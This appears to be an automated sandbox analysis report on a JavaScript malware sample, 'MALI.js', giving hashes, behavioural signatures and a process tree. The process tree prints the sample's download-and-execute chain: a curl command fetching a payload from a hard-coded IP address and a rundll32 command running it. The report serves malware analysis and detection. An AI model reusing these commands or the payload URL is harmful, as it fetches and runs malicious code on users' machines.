Analysis
-
max time kernel
98s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
15/06/2023, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
MALI.js
Resource
win7-20230220-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
MALI.js
Resource
win10v2004-20230220-en
4 signatures
150 seconds
General
-
Target
MALI.js
-
Size
5KB
-
MD5
2e2a333269db2c655436c1be1be43c09
-
SHA1
bbc40f028bc2176367de0a17e4410b65e2a5ba6e
-
SHA256
ca015d4346a4a3fcfe0abcbed4913d53beaf534aaa769777dd4ec08c2c47a97b
-
SHA512
6a955602789aaac3ffb9e6ecd9a2878667615a1cb1d436f9095920737f7d71bd13d067c3c677da6ec08ff6488b608575236b03c3ff44505e32a48c2cc533529e
-
SSDEEP
96:xYk6M1fyNvTv6OjoJTv2ZcJZNFYUie52CA2ZcJZCYUiR7hUinyE7cVUfbiZqgbtO:36MRyNvTv6FJ+OZE
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 4180 wscript.exe 5 4180 wscript.exe 7 4180 wscript.exe 18 4180 wscript.exe 19 4180 wscript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4180 wrote to memory of 2428 4180 wscript.exe 85 PID 4180 wrote to memory of 2428 4180 wscript.exe 85 PID 4180 wrote to memory of 908 4180 wscript.exe 95 PID 4180 wrote to memory of 908 4180 wscript.exe 95 PID 908 wrote to memory of 4568 908 conhost.exe 96 PID 908 wrote to memory of 4568 908 conhost.exe 96
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\MALI.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\System32\curl.exe"C:\Windows\System32\curl.exe" -o c:\users\public\mongrel.tmp http://151.236.14.86/gF1sH2v/BC9352⤵PID:2428
-
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" rundll32.exe c:\users\public\mongrel.tmp,must2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\rundll32.exerundll32.exe c:\users\public\mongrel.tmp,must3⤵PID:4568
-
-